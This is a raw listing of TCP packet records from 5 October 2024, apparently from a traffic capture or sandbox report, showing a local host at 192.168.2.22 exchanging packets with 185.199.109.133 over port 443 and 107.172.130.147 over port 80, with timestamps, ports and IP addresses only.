                                                                                                                                      Oct 5, 2024 14:52:56.721168041 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721174955 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.721206903 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721252918 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721431017 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.721460104 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.721488953 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721493959 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.721518040 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721544981 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721782923 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.721817017 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.721848011 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721853971 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.721865892 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.721896887 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.722553968 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.722589016 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.722618103 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.722624063 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.722632885 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.722645044 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.722666025 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.722831011 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.722860098 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.722887993 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.722893953 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.722908020 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.722933054 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.723135948 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.723169088 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.723192930 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.723197937 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.723210096 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.723294020 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.723426104 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.723459959 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.723483086 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.723490953 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.723540068 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813311100 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813354969 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813477039 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813510895 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813559055 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813559055 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813559055 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813592911 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813630104 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813630104 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813772917 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813802958 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813817978 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813829899 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.813848019 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.813899040 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.814130068 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.814162016 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.814186096 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.814194918 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.814204931 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815036058 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815071106 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815083981 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815093040 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815113068 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815279007 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815311909 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815331936 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815339088 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815356970 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815526009 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815561056 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815576077 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815582991 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815604925 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815829992 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815859079 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815879107 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.815885067 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.815910101 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.905654907 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.905708075 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.905725956 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.905767918 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.905783892 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.905783892 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.905823946 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.905853033 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.905869961 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.905879021 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.905903101 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.905949116 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.906094074 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.906126976 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.906135082 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.906143904 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.906163931 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.906181097 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.906419039 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.906450987 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.906469107 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.906476974 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.906491995 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.907335043 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.907367945 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.907388926 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.907399893 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.907414913 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.907618999 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.907646894 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.907670021 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.907680035 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.907690048 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.907723904 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.907923937 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.910222054 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:56.961683035 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:56.966660023 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:56.966825962 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:56.966897011 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:56.971685886 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442857981 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442874908 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442884922 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442898035 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442913055 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442928076 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442929983 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.442939997 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442953110 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442964077 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442975044 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.442975998 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.442975998 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.442996025 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.447902918 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.447945118 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.447956085 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.447967052 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.448003054 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.529736042 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529757023 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529768944 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529778957 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529789925 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529800892 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529814005 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529824018 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529830933 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.529874086 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.529874086 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.529874086 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.530558109 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530567884 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530575991 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530620098 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.530905008 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530924082 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530937910 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530947924 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530957937 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.530970097 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.531002998 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.531766891 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.531788111 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.531799078 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.531835079 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.531869888 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.531883001 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.531919003 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.533250093 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.534982920 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.534992933 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.535003901 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.535046101 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.616369963 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616400957 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616411924 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616424084 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616435051 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616453886 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616466999 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616478920 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616488934 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616499901 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616527081 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.616528034 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.616528034 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.616683006 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616700888 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616739988 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.616786957 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616797924 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616807938 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616818905 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.616852999 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.617194891 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617234945 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.617263079 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617275953 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617295980 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617305994 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617315054 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617321014 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.617328882 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617347002 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.617372990 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.617379904 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617392063 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617402077 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.617435932 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.618251085 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618262053 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618279934 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618289948 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618300915 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618310928 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618310928 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.618323088 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618334055 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618333101 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.618346930 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618350983 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.618359089 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.618377924 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.618442059 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.619154930 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619164944 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619172096 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619215012 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.619236946 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619247913 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619257927 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619278908 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619290113 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.619291067 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619303942 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619317055 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.619342089 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.619375944 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.620085001 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.659288883 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.659310102 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.659317017 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.659322023 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.659435987 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.703248024 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703259945 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703269005 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703290939 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703301907 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703310966 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703322887 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703331947 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703337908 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.703342915 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703356028 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.703383923 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.703383923 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.703412056 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.705063105 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.705838919 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.705885887 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.706262112 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.706273079 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.706310987 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.706418037 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.706593990 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.706634998 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.706757069 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707004070 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707020998 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707031012 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707050085 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707050085 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707065105 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707071066 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707077026 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707088947 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707106113 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707119942 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707160950 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707171917 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707192898 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707207918 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707209110 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707221031 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707231998 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707242012 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707250118 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707251072 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707262993 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707274914 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707277060 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707285881 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707304955 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707308054 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707317114 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707328081 CEST8049163107.172.130.147192.168.2.22
